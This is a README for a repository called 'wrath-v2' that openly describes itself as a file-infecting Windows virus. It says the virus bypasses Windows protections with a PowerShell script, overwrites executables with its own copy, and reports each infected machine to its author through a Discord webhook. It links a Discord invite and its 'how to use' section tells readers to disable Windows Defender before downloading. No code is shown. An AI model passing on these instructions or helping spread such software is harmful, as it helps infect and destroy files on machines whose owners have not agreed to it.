the8bitbyte/wrath-v2/README.md

 wrath used a powershell script to bypass some restrictions implented by windows to stop viruses. wrath is a very simple virus and does not inject its code into executables but rather replaces them with itself. wrath also has a discord webhook built into it so it notifys me when it infects a new machine. wrath currently has no payload, all it does is infect files, i plan to release a new version in the future with a payload.

+if you want to join the discord server with the webhook you can here: https://discord.gg/K98zxMeG

 # how to use

 1. disable windows defender before downloading to pervent the downloads from being blocked.